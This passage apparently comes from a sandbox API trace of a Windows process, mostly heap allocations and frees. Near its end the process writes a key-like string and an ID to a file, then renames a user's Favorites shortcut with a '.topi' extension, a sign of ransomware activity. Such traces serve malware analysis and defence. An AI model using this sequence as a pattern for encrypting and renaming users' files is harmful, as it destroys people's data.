(in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a027e0 [0096.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0096.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02828 [0096.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0096.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98e8 [0096.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0096.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98d0 [0096.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.408] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.408] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98e8 | out: hHeap=0x680000) returned 1 [0096.409] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98d0 | out: hHeap=0x680000) returned 1 [0096.409] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0096.409] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.409] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.409] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0096.409] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0096.409] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d98d0 [0096.409] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0096.409] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d98e8 [0096.409] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0096.409] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.409] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.409] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.409] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.409] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.409] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.409] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.409] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.409] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98d0 | out: hHeap=0x680000) returned 1 [0096.409] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.409] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98e8 | out: hHeap=0x680000) returned 1 [0096.409] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.409] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.409] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0096.409] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.409] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.409] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.410] GetCurrentThreadId () returned 0x8c4 [0096.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f7d10 [0096.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.410] GetCurrentThreadId () returned 0x8c4 [0096.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0096.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0096.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0096.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0096.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98e8 [0096.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0096.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98d0 [0096.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6d4bd0 [0096.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x9a03438 [0096.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x9a03450 [0096.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x9a03468 [0096.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03450 | out: hHeap=0x680000) returned 1 [0096.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x9a03450 [0096.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0096.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98e8 | out: hHeap=0x680000) returned 1 [0096.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98e8 [0096.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0096.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03450 | out: hHeap=0x680000) returned 1 [0096.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98e8 | out: hHeap=0x680000) returned 1 [0096.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0096.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03468 | out: hHeap=0x680000) returned 1 [0096.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6d4bd0 | out: hHeap=0x680000) returned 1 [0096.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98d0 | out: hHeap=0x680000) returned 1 [0096.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0096.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02828 | out: hHeap=0x680000) returned 1 [0096.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0096.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.415] WriteFile (in: hFile=0x6a8, lpBuffer=0x31b3ff8*, nNumberOfBytesToWrite=0x81, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x31b3ff8*, lpNumberOfBytesWritten=0x9ccfb14*=0x81, lpOverlapped=0x0) returned 1 [0096.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3ff8 | out: hHeap=0x680000) returned 1 [0096.415] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x86, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.415] WriteFile (in: hFile=0x6a8, lpBuffer=0x99def60*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99def60*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.416] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0096.416] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0096.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.416] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0096.416] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.416] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0096.416] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.416] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.416] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.416] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.416] CloseHandle (hObject=0x6a8) returned 1 [0096.422] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ebb8 [0096.422] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0096.422] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ebb8 | out: hHeap=0x680000) returned 1 [0096.422] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.topi")) returned 1 [0096.423] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.423] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.423] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.424] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0096.424] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0096.424] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0096.424] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0096.424] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0096.424] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0096.424] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3da8 [0096.424] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0096.424] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.424] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.424] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.424] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0096.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) 